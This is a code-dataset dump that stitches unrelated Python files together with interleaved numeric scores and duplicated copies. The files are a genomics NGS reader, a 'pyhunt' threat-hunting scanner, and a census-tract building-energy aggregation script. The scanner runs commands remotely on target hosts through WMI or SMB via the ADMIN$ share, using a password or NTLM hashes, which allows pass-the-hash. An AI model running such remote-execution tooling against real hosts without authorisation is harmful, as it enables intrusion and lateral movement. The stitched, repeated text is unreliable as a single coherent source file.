import os from typing import Optional, Sequence, Dict, List from csr.exceptions import ReaderException from sources2csr.ngs import AnalysisType, NGS, LibraryStrategy class NgsReader: """Reader that reads NGS data files. """ def __init__(self, input_dir: str, library_strategy: LibraryStrategy): self.input_dir = input_dir self.library_strategy = library_strategy @staticmethod def determine_analysis_type(filename: str) -> Optional[AnalysisType]: """Determine whole genome or whole exome sequencing analysis type based on the filename. If _WGS or _WXS are not in the filename returns None. :param filename: name of the input file :return: Type of sequencing event """ if '_WGS' in filename.upper(): return AnalysisType.WGS elif '_WXS' in filename.upper(): return AnalysisType.WXS else: return None @staticmethod def biosource_biomaterial_from_sample_id(sample_id: str, filename: str, by='_') -> tuple: """ Splits sample _id into biosource_id and biomaterial_id. Every sample ID should be structured as <BiosourceID>_<BiomaterialID>, e.g. PMCBS000AAA_PMCBM000AAA. :param sample_id: cBioPortal sample ID :param filename: ull path with a name of the input file :param by: Character to use for splitting, default: '_' :return: biosource_id and biomaterial_id values tuple or NgsReaderException """ biosource_biomaterial_pair = sample_id.split(by) if len(biosource_biomaterial_pair) != 2: raise ReaderException('Invalid sample_id format found in {} NGS file. 
sample_id: {}' .format(filename, sample_id)) else: return biosource_biomaterial_pair[0], biosource_biomaterial_pair[1] @staticmethod def list_files(input_dir: str) -> List[str]: """ Get list of file names inside a directory :param input_dir: directory with input files :return: List of file paths with names """ for file in os.listdir(input_dir): if os.path.isfile(os.path.join(input_dir, file)): yield file def map_ngs(self, biosources_biomaterials_dict: Dict[str, Sequence[str]], filename: str) -> Optional[Sequence[NGS]]: """ Maps biosource to biomaterials dictionary to the NGS Sequence :param biosources_biomaterials_dict: biosource to biomaterials dictionary :param filename: name of the input file :return: """ ngs_data = [] analysis_type = self.determine_analysis_type(filename) for biosource, biomaterials in biosources_biomaterials_dict.items(): for biomaterial in biomaterials: ngs_data.append(NGS(biosource_id=biosource, biomaterial_id=biomaterial, analysis_type=analysis_type, library_strategy=self.library_strategy)) return ngs_data def read_data(self, filename: str) -> Optional[Sequence[NGS]]: pass
0.825836
0.331471
from pyhunt.deploy import WMIEXEC from pyhunt.deploy_smb import CMDEXEC from multiprocessing import Process, Pool from time import sleep class HuntScan: def __init__(self, usr, pwd, domain, hashes=''): self.targets = [] self.__currentpath = '' self.surveyfile = "survey/survey.ps1" self.tgtdestdirectory = "c:\\windows\\temp" self.__status = {} self.requiredfiles = ["survey/sigcheck.exe", "survey/sigcheck64.exe"] self.components = [] self.__receiver = None self.__username = usr self.__password = <PASSWORD> self.__domain = domain self.__hashes = hashes self.protocol = "SMB" self.shell = None def run(self): try: if self.__hashes == '': if self.protocol == "WMI": executer = WMIEXEC('dir', self.__username, self.__password, self.__domain, None, None, "ADMIN$", scanObject=self) else: executer = CMDEXEC(self.__username, self.__password, self.__domain, None, None, None, None, "SHARE", "ADMIN$", 445, scanObject=self) else: if self.protocol == "WMI": executer = WMIEXEC('dir', self.__username, '', self.__domain, self.__hashes, None, "ADMIN$", scanObject=self) else: executer = CMDEXEC(self.__username, self.__password, self.__domain, self.__hashes, None, None, None, "SHARE", "ADMIN$", 445, scanObject=self) threads = [] cap = 1 running = 0 for t in self.targets: p = Process(target=executer.run, args=(t,)) p.start() threads.append(p) running += 1 for p in threads: p.join() except (Exception, KeyboardInterrupt), e: import traceback print traceback.print_exc() print str(e) def addTargetList(self, tgt): self.targets = tgt def __str__(self): retVal = self.__domain + "\\" + self.__username + "\n" + str(self.targets) + "\n" + "Survey File: " + self.surveyfile + "\n" + "Protocol: " + self.protocol + "\n" + "Required Files: " + str(self.requiredfiles) + "\n" return retVal #h = HuntScan("user", "pw", "localhost", "") #h.addTargetList(["192.168.149.141"]) #h.addTargetList(["10.1.1.20"]) #h.run()
scan.py
from pyhunt.deploy import WMIEXEC from pyhunt.deploy_smb import CMDEXEC from multiprocessing import Process, Pool from time import sleep class HuntScan: def __init__(self, usr, pwd, domain, hashes=''): self.targets = [] self.__currentpath = '' self.surveyfile = "survey/survey.ps1" self.tgtdestdirectory = "c:\\windows\\temp" self.__status = {} self.requiredfiles = ["survey/sigcheck.exe", "survey/sigcheck64.exe"] self.components = [] self.__receiver = None self.__username = usr self.__password = <PASSWORD> self.__domain = domain self.__hashes = hashes self.protocol = "SMB" self.shell = None def run(self): try: if self.__hashes == '': if self.protocol == "WMI": executer = WMIEXEC('dir', self.__username, self.__password, self.__domain, None, None, "ADMIN$", scanObject=self) else: executer = CMDEXEC(self.__username, self.__password, self.__domain, None, None, None, None, "SHARE", "ADMIN$", 445, scanObject=self) else: if self.protocol == "WMI": executer = WMIEXEC('dir', self.__username, '', self.__domain, self.__hashes, None, "ADMIN$", scanObject=self) else: executer = CMDEXEC(self.__username, self.__password, self.__domain, self.__hashes, None, None, None, "SHARE", "ADMIN$", 445, scanObject=self) threads = [] cap = 1 running = 0 for t in self.targets: p = Process(target=executer.run, args=(t,)) p.start() threads.append(p) running += 1 for p in threads: p.join() except (Exception, KeyboardInterrupt), e: import traceback print traceback.print_exc() print str(e) def addTargetList(self, tgt): self.targets = tgt def __str__(self): retVal = self.__domain + "\\" + self.__username + "\n" + str(self.targets) + "\n" + "Survey File: " + self.surveyfile + "\n" + "Protocol: " + self.protocol + "\n" + "Required Files: " + str(self.requiredfiles) + "\n" return retVal #h = HuntScan("user", "pw", "localhost", "") #h.addTargetList(["192.168.149.141"]) #h.addTargetList(["10.1.1.20"]) #h.run()
0.240329
0.070624
import os import geopandas as gpd import numpy as np import pandas as pd from prereise.gather.demanddata.bldg_electrification import const def aggregate_puma_df( puma_states, tract_puma_mapping, tract_gbs_area, tract_degday_normals, tract_pop ): """Scale census tract data up to puma areas. :param pandas.DataFrame puma_states: mapping of puma to state. :param pandas.DataFrame tract_puma_mapping: tract to puma mapping. :param pandas.DataFrame tract_gbs_area: General Building Stock area for residential, commercial, industrial areas by tract :param pandas.DataFrame tract_degday_normals: heating and cooling degree day normals by tract :param pandas.DataFrame tract_pop: population by tract :return: (*pandas.DataFrame*) -- population; residential, commercial, industrial areas; heating degree days; cooling degree days; residential space heating household fuel fractions. """ # Set up puma_df data frame puma_df = puma_states.to_frame() # Combine tract-level data into single data frame with only census tracts with building area data tract_data = pd.concat( [tract_gbs_area, tract_degday_normals, tract_pop], axis=1, join="inner" ) tract_data = tract_data.loc[:, ~tract_data.columns.duplicated()] # Group tracts by PUMA for aggregration grouped_tracts = tract_data.groupby(tract_puma_mapping["puma"]) # Sum population and GBS areas; store in data frame puma_df.loc[grouped_tracts.groups.keys(), "pop"] = grouped_tracts["pop"].sum() puma_df.loc[grouped_tracts.groups.keys(), "res_area_gbs_m2"] = grouped_tracts[ "res_area_gbs_m2" ].sum() puma_df.loc[grouped_tracts.groups.keys(), "com_area_gbs_m2"] = grouped_tracts[ "com_area_gbs_m2" ].sum() puma_df.loc[grouped_tracts.groups.keys(), "ind_area_gbs_m2"] = grouped_tracts[ "ind_area_gbs_m2" ].sum() # Population-weighted average hdd, cdd, and acpen tract_data["pop_hdd65_normals"] = tract_data["pop"] * tract_data["hdd65_normals"] tract_data["pop_cdd65_normals"] = tract_data["pop"] * tract_data["cdd65_normals"] 
puma_df.loc[grouped_tracts.groups.keys(), "hdd65_normals"] = ( grouped_tracts["pop_hdd65_normals"].sum() / grouped_tracts["pop"].sum() ) puma_df.loc[grouped_tracts.groups.keys(), "cdd65_normals"] = ( grouped_tracts["pop_cdd65_normals"].sum() / grouped_tracts["pop"].sum() ) # Load RECS and CBECS area scales for res and com resscales = pd.read_csv(os.path.join(data_dir, "area_scale_res.csv")) comscales = pd.read_csv(os.path.join(data_dir, "area_scale_com.csv")) # Compute GBS areas for state groups in RECS and CBECS resscales["GBS"] = [ puma_df.query("state in @s")["res_area_gbs_m2"].sum() * const.conv_m2_to_ft2 * const.conv_ft2_to_bsf for s in resscales.fillna(0).values.tolist() ] comscales["GBS"] = [ puma_df.query("state in @s")["com_area_gbs_m2"].sum() * const.conv_m2_to_ft2 * const.conv_ft2_to_bsf for s in comscales.fillna(0).values.tolist() ] # Compute scalar for GBS area to base year area correspondingg to RECS/CBECS # and assuming a constant annual growth rate resscales["area_scalar"] = ( resscales[f"RECS{const.recs_date_1}"] * ( ( resscales[f"RECS{const.recs_date_2}"] / resscales[f"RECS{const.recs_date_1}"] ) ** ( (const.base_year - const.recs_date_1) / (const.recs_date_2 - const.recs_date_1) ) ) / resscales["GBS"] ) comscales["area_scalar"] = ( comscales[f"CBECS{const.cbecs_date_1}"] * ( ( comscales[f"CBECS{const.cbecs_date_2}"] / comscales[f"CBECS{const.cbecs_date_1}"] ) ** ( (const.base_year - const.cbecs_date_1) / (const.cbecs_date_2 - const.cbecs_date_1) ) ) / comscales["GBS"] ) # Scale puma area from gbs to base year for state in const.state_list: state_row_scale_res = resscales[resscales.eq(state).any(1)].reset_index() state_row_scale_com = comscales[comscales.eq(state).any(1)].reset_index() res_area_scalar = state_row_scale_res["area_scalar"][0] com_area_scalar = state_row_scale_com["area_scalar"][0] puma_df.loc[puma_df["state"] == state, f"res_area_{const.base_year}_m2"] = ( puma_df[puma_df["state"] == state]["res_area_gbs_m2"] * res_area_scalar ) 
puma_df.loc[puma_df["state"] == state, f"com_area_{const.base_year}_m2"] = ( puma_df[puma_df["state"] == state]["com_area_gbs_m2"] * com_area_scalar ) return puma_df def scale_fuel_fractions(hh_fuels, puma_df, year=const.base_year): """Scale census tract data up to puma areas. :param pandas.DataFrame hh_fuels: household fuel type by puma. :param pandas.DataFrame puma_df: output of :func:`aggregate_puma_df`. :param int/str year: year to use within label when creating columns. :return: (*pandas.DataFrame*) -- fractions of natural gas, fuel oil and kerosone, propane, and electricity used for space heating, hot water, cooking, and other in residential and commercial buildings. """ # Calculate res fractions of fuel usage based off ACS puma_fuel household data puma_df["frac_sh_res_natgas_acs"] = hh_fuels["hh_utilgas"] / hh_fuels["hh_total"] for f in ["fok", "othergas", "coal", "wood", "solar", "elec", "other", "none"]: puma_df[f"frac_sh_res_{f}_acs"] = hh_fuels[f"hh_{f}"] / hh_fuels["hh_total"] region_map = {state: r for r, states in const.regions.items() for state in states} puma_region_groups = puma_df.groupby(puma_df["state"].map(region_map)) for c in const.classes: # Compute area fraction for each fuel type (column) in each region (index) area_fractions = puma_region_groups.apply( lambda x: pd.Series( { f: ( ( x[f"frac_sh_res_{f}_acs"] * x[f"{c}_area_{const.base_year}_m2"] ).sum() / x[f"{c}_area_{const.base_year}_m2"].sum() ) for f in const.fuel } ) ) # Scale per-PUMA values to match target regional values (calculated externally) uselist = ["sh", "dhw", "other"] if c == "res" else ["sh", "dhw", "cook"] for u in uselist: area_fraction_targets = pd.read_csv( os.path.join(data_dir, f"frac_target_{u}_{c}.csv"), index_col=0, ) down_scale = area_fraction_targets / area_fractions up_scale = (area_fraction_targets - area_fractions) / (1 - area_fractions) for r in const.regions: for f in const.fuel: pre_scaling = puma_region_groups.get_group(r)[ f"frac_sh_res_{f}_acs" ] if 
down_scale.loc[r, f] <= 1: scaled = pre_scaling * down_scale.loc[r, f] else: scaled = pre_scaling + up_scale.loc[r, f] * (1 - pre_scaling) puma_df.loc[pre_scaling.index, f"frac_{f}_{u}_{c}_{year}"] = scaled # Sum coal, wood, solar and other fractions for frac_com_other named_sh_com_fuels = {"elec", "fok", "natgas", "othergas"} named_sh_com_cols = [f"frac_{f}_sh_com_{year}" for f in named_sh_com_fuels] puma_df[f"frac_other_sh_com_{year}"] = 1 - puma_df[named_sh_com_cols].sum(axis=1) # Copy residential space heating columns to match new column naming convention fossil_fuels = {"natgas", "othergas", "fok"} for c in const.classes: uselist = ["sh", "dhw", "other"] if c == "res" else ["sh", "dhw", "cook"] for u in uselist: fossil_cols = [f"frac_{f}_{u}_{c}_{year}" for f in fossil_fuels] puma_df[f"frac_ff_{u}_{c}_{year}"] = puma_df[fossil_cols].sum(axis=1) return puma_df def puma_timezone_latlong(timezones, pumas): """Assign timezone and lat/long to each puma. :param geopandas.DataFrame timezones: US timezones. :param geopandas.DataFrame pumas: US pumas. :return: (*pandas.Series*) -- timezone for every puma. :return: (*pandas.DataFrame*) -- latitude and longitude for every puma. 
""" puma_timezone = gpd.overlay(pumas, timezones.to_crs("EPSG:4269")) puma_timezone["area"] = puma_timezone.area puma_timezone.sort_values("area", ascending=False, inplace=True) puma_timezone = puma_timezone.drop_duplicates(subset="GEOID10", keep="first") puma_timezone.sort_values("GEOID10", ascending=True, inplace=True) puma_lat_long = pd.DataFrame( { "puma": "puma_" + pumas["GEOID10"], "latitude": [float(pumas["INTPTLAT10"][i]) for i in range(len(pumas))], "longitude": [float(pumas["INTPTLON10"][i]) for i in range(len(pumas))], } ) puma_lat_long = puma_lat_long.set_index("puma") return puma_timezone["tzid"], puma_lat_long if __name__ == "__main__": data_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data") # Load ACS fuel data puma_fuel = pd.read_csv(os.path.join(data_dir, "puma_fuel.csv"), index_col="puma") # Load tract_puma_mapping tract_puma_mapping = pd.read_csv( os.path.join(data_dir, "tract_puma_mapping.csv"), index_col="tract" ) # Load tract-level data for General Building Stock area for residential, commercial and industral classes tract_gbs_area = pd.read_csv( os.path.join(data_dir, "tract_gbs_area.csv"), index_col="tract" ) # Load tract-level data for heating and cooling degree day normals tract_degday_normals = pd.read_csv( os.path.join(data_dir, "tract_degday_normals.csv"), index_col="tract" ) # Load tract-level data for population tract_pop = pd.read_csv(os.path.join(data_dir, "tract_pop.csv"), index_col="tract") puma_data_unscaled = aggregate_puma_df( puma_fuel["state"], tract_puma_mapping, tract_gbs_area, tract_degday_normals, tract_pop, ) puma_data = scale_fuel_fractions(puma_fuel, puma_data_unscaled) # Add time zone information puma_timezones = pd.read_csv( os.path.join(data_dir, "puma_timezone.csv"), index_col="puma" ) puma_data["timezone"] = puma_timezones["timezone"] # Add latitude and longitude information puma_lat_long = pd.read_csv( os.path.join(data_dir, "puma_lat_long.csv"), index_col="puma" ) puma_data["latitude"], 
puma_data["longitude"] = ( puma_lat_long["latitude"], puma_lat_long["longitude"], ) # Add residential AC penetration acpen_b = 0.00117796 acpen_n = 1.1243 puma_data["AC_penetration"] = 1 - np.exp( -acpen_b * puma_data["cdd65_normals"] ** acpen_n ) puma_data.to_csv(os.path.join(data_dir, "puma_data.csv"))
prereise/gather/demanddata/bldg_electrification/puma_data_agg.py
import os import geopandas as gpd import numpy as np import pandas as pd from prereise.gather.demanddata.bldg_electrification import const def aggregate_puma_df( puma_states, tract_puma_mapping, tract_gbs_area, tract_degday_normals, tract_pop ): """Scale census tract data up to puma areas. :param pandas.DataFrame puma_states: mapping of puma to state. :param pandas.DataFrame tract_puma_mapping: tract to puma mapping. :param pandas.DataFrame tract_gbs_area: General Building Stock area for residential, commercial, industrial areas by tract :param pandas.DataFrame tract_degday_normals: heating and cooling degree day normals by tract :param pandas.DataFrame tract_pop: population by tract :return: (*pandas.DataFrame*) -- population; residential, commercial, industrial areas; heating degree days; cooling degree days; residential space heating household fuel fractions. """ # Set up puma_df data frame puma_df = puma_states.to_frame() # Combine tract-level data into single data frame with only census tracts with building area data tract_data = pd.concat( [tract_gbs_area, tract_degday_normals, tract_pop], axis=1, join="inner" ) tract_data = tract_data.loc[:, ~tract_data.columns.duplicated()] # Group tracts by PUMA for aggregration grouped_tracts = tract_data.groupby(tract_puma_mapping["puma"]) # Sum population and GBS areas; store in data frame puma_df.loc[grouped_tracts.groups.keys(), "pop"] = grouped_tracts["pop"].sum() puma_df.loc[grouped_tracts.groups.keys(), "res_area_gbs_m2"] = grouped_tracts[ "res_area_gbs_m2" ].sum() puma_df.loc[grouped_tracts.groups.keys(), "com_area_gbs_m2"] = grouped_tracts[ "com_area_gbs_m2" ].sum() puma_df.loc[grouped_tracts.groups.keys(), "ind_area_gbs_m2"] = grouped_tracts[ "ind_area_gbs_m2" ].sum() # Population-weighted average hdd, cdd, and acpen tract_data["pop_hdd65_normals"] = tract_data["pop"] * tract_data["hdd65_normals"] tract_data["pop_cdd65_normals"] = tract_data["pop"] * tract_data["cdd65_normals"] 
puma_df.loc[grouped_tracts.groups.keys(), "hdd65_normals"] = ( grouped_tracts["pop_hdd65_normals"].sum() / grouped_tracts["pop"].sum() ) puma_df.loc[grouped_tracts.groups.keys(), "cdd65_normals"] = ( grouped_tracts["pop_cdd65_normals"].sum() / grouped_tracts["pop"].sum() ) # Load RECS and CBECS area scales for res and com resscales = pd.read_csv(os.path.join(data_dir, "area_scale_res.csv")) comscales = pd.read_csv(os.path.join(data_dir, "area_scale_com.csv")) # Compute GBS areas for state groups in RECS and CBECS resscales["GBS"] = [ puma_df.query("state in @s")["res_area_gbs_m2"].sum() * const.conv_m2_to_ft2 * const.conv_ft2_to_bsf for s in resscales.fillna(0).values.tolist() ] comscales["GBS"] = [ puma_df.query("state in @s")["com_area_gbs_m2"].sum() * const.conv_m2_to_ft2 * const.conv_ft2_to_bsf for s in comscales.fillna(0).values.tolist() ] # Compute scalar for GBS area to base year area correspondingg to RECS/CBECS # and assuming a constant annual growth rate resscales["area_scalar"] = ( resscales[f"RECS{const.recs_date_1}"] * ( ( resscales[f"RECS{const.recs_date_2}"] / resscales[f"RECS{const.recs_date_1}"] ) ** ( (const.base_year - const.recs_date_1) / (const.recs_date_2 - const.recs_date_1) ) ) / resscales["GBS"] ) comscales["area_scalar"] = ( comscales[f"CBECS{const.cbecs_date_1}"] * ( ( comscales[f"CBECS{const.cbecs_date_2}"] / comscales[f"CBECS{const.cbecs_date_1}"] ) ** ( (const.base_year - const.cbecs_date_1) / (const.cbecs_date_2 - const.cbecs_date_1) ) ) / comscales["GBS"] ) # Scale puma area from gbs to base year for state in const.state_list: state_row_scale_res = resscales[resscales.eq(state).any(1)].reset_index() state_row_scale_com = comscales[comscales.eq(state).any(1)].reset_index() res_area_scalar = state_row_scale_res["area_scalar"][0] com_area_scalar = state_row_scale_com["area_scalar"][0] puma_df.loc[puma_df["state"] == state, f"res_area_{const.base_year}_m2"] = ( puma_df[puma_df["state"] == state]["res_area_gbs_m2"] * res_area_scalar ) 
puma_df.loc[puma_df["state"] == state, f"com_area_{const.base_year}_m2"] = ( puma_df[puma_df["state"] == state]["com_area_gbs_m2"] * com_area_scalar ) return puma_df def scale_fuel_fractions(hh_fuels, puma_df, year=const.base_year): """Scale census tract data up to puma areas. :param pandas.DataFrame hh_fuels: household fuel type by puma. :param pandas.DataFrame puma_df: output of :func:`aggregate_puma_df`. :param int/str year: year to use within label when creating columns. :return: (*pandas.DataFrame*) -- fractions of natural gas, fuel oil and kerosone, propane, and electricity used for space heating, hot water, cooking, and other in residential and commercial buildings. """ # Calculate res fractions of fuel usage based off ACS puma_fuel household data puma_df["frac_sh_res_natgas_acs"] = hh_fuels["hh_utilgas"] / hh_fuels["hh_total"] for f in ["fok", "othergas", "coal", "wood", "solar", "elec", "other", "none"]: puma_df[f"frac_sh_res_{f}_acs"] = hh_fuels[f"hh_{f}"] / hh_fuels["hh_total"] region_map = {state: r for r, states in const.regions.items() for state in states} puma_region_groups = puma_df.groupby(puma_df["state"].map(region_map)) for c in const.classes: # Compute area fraction for each fuel type (column) in each region (index) area_fractions = puma_region_groups.apply( lambda x: pd.Series( { f: ( ( x[f"frac_sh_res_{f}_acs"] * x[f"{c}_area_{const.base_year}_m2"] ).sum() / x[f"{c}_area_{const.base_year}_m2"].sum() ) for f in const.fuel } ) ) # Scale per-PUMA values to match target regional values (calculated externally) uselist = ["sh", "dhw", "other"] if c == "res" else ["sh", "dhw", "cook"] for u in uselist: area_fraction_targets = pd.read_csv( os.path.join(data_dir, f"frac_target_{u}_{c}.csv"), index_col=0, ) down_scale = area_fraction_targets / area_fractions up_scale = (area_fraction_targets - area_fractions) / (1 - area_fractions) for r in const.regions: for f in const.fuel: pre_scaling = puma_region_groups.get_group(r)[ f"frac_sh_res_{f}_acs" ] if 
down_scale.loc[r, f] <= 1: scaled = pre_scaling * down_scale.loc[r, f] else: scaled = pre_scaling + up_scale.loc[r, f] * (1 - pre_scaling) puma_df.loc[pre_scaling.index, f"frac_{f}_{u}_{c}_{year}"] = scaled # Sum coal, wood, solar and other fractions for frac_com_other named_sh_com_fuels = {"elec", "fok", "natgas", "othergas"} named_sh_com_cols = [f"frac_{f}_sh_com_{year}" for f in named_sh_com_fuels] puma_df[f"frac_other_sh_com_{year}"] = 1 - puma_df[named_sh_com_cols].sum(axis=1) # Copy residential space heating columns to match new column naming convention fossil_fuels = {"natgas", "othergas", "fok"} for c in const.classes: uselist = ["sh", "dhw", "other"] if c == "res" else ["sh", "dhw", "cook"] for u in uselist: fossil_cols = [f"frac_{f}_{u}_{c}_{year}" for f in fossil_fuels] puma_df[f"frac_ff_{u}_{c}_{year}"] = puma_df[fossil_cols].sum(axis=1) return puma_df def puma_timezone_latlong(timezones, pumas): """Assign timezone and lat/long to each puma. :param geopandas.DataFrame timezones: US timezones. :param geopandas.DataFrame pumas: US pumas. :return: (*pandas.Series*) -- timezone for every puma. :return: (*pandas.DataFrame*) -- latitude and longitude for every puma. 
""" puma_timezone = gpd.overlay(pumas, timezones.to_crs("EPSG:4269")) puma_timezone["area"] = puma_timezone.area puma_timezone.sort_values("area", ascending=False, inplace=True) puma_timezone = puma_timezone.drop_duplicates(subset="GEOID10", keep="first") puma_timezone.sort_values("GEOID10", ascending=True, inplace=True) puma_lat_long = pd.DataFrame( { "puma": "puma_" + pumas["GEOID10"], "latitude": [float(pumas["INTPTLAT10"][i]) for i in range(len(pumas))], "longitude": [float(pumas["INTPTLON10"][i]) for i in range(len(pumas))], } ) puma_lat_long = puma_lat_long.set_index("puma") return puma_timezone["tzid"], puma_lat_long if __name__ == "__main__": data_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data") # Load ACS fuel data puma_fuel = pd.read_csv(os.path.join(data_dir, "puma_fuel.csv"), index_col="puma") # Load tract_puma_mapping tract_puma_mapping = pd.read_csv( os.path.join(data_dir, "tract_puma_mapping.csv"), index_col="tract" ) # Load tract-level data for General Building Stock area for residential, commercial and industral classes tract_gbs_area = pd.read_csv( os.path.join(data_dir, "tract_gbs_area.csv"), index_col="tract" ) # Load tract-level data for heating and cooling degree day normals tract_degday_normals = pd.read_csv( os.path.join(data_dir, "tract_degday_normals.csv"), index_col="tract" ) # Load tract-level data for population tract_pop = pd.read_csv(os.path.join(data_dir, "tract_pop.csv"), index_col="tract") puma_data_unscaled = aggregate_puma_df( puma_fuel["state"], tract_puma_mapping, tract_gbs_area, tract_degday_normals, tract_pop, ) puma_data = scale_fuel_fractions(puma_fuel, puma_data_unscaled) # Add time zone information puma_timezones = pd.read_csv( os.path.join(data_dir, "puma_timezone.csv"), index_col="puma" ) puma_data["timezone"] = puma_timezones["timezone"] # Add latitude and longitude information puma_lat_long = pd.read_csv( os.path.join(data_dir, "puma_lat_long.csv"), index_col="puma" ) puma_data["latitude"], 
puma_data["longitude"] = ( puma_lat_long["latitude"], puma_lat_long["longitude"], ) # Add residential AC penetration acpen_b = 0.00117796 acpen_n = 1.1243 puma_data["AC_penetration"] = 1 - np.exp( -acpen_b * puma_data["cdd65_normals"] ** acpen_n ) puma_data.to_csv(os.path.join(data_dir, "puma_data.csv"))
0.764892
0.402744